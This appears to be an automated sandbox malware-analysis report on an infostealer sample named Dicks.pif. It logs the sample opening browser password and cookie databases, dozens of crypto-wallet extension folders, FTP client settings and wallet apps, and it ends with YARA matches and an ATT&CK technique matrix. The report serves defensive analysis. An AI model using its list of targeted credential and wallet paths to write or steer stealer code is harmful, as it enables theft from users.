              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: Dicks.pifBinary or memory string: WIN_81
              Source: Dicks.pifBinary or memory string: WIN_XP
              Source: Dicks.pifBinary or memory string: WIN_XPe
              Source: Dicks.pifBinary or memory string: WIN_VISTA
              Source: Dicks.pifBinary or memory string: WIN_7
              Source: Dicks.pifBinary or memory string: WIN_8
              Source: Utility.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: Yara matchFile source: 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3198982673.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3156175797.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3155203388.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Dicks.pif PID: 3248, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Dicks.pif PID: 3248, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,19_2_000A696E
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_000A6E32
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              11
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomains1
              Replication Through Removable Media
              1
              Native API
              2
              Valid Accounts
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              11
              Peripheral Device Discovery
              Remote Desktop Protocol41
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)2
              Valid Accounts
              3
              Obfuscated Files or Information
              Security Account Manager1
              Account Discovery
              SMB/Windows Admin Shares21
              Input Capture
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login Hook21
              Access Token Manipulation
              1
              Software Packing
              NTDS12
              File and Directory Discovery
              Distributed Component Object Model3
              Clipboard Data
              113
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets38
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion
              Cached Domain Credentials251
              Security Software Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items122
              Masquerading
              DCSync21
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Valid Accounts
              Proc Filesystem4
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
              Access Token Manipulation
              Network Sniffing1
              System Owner/User Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
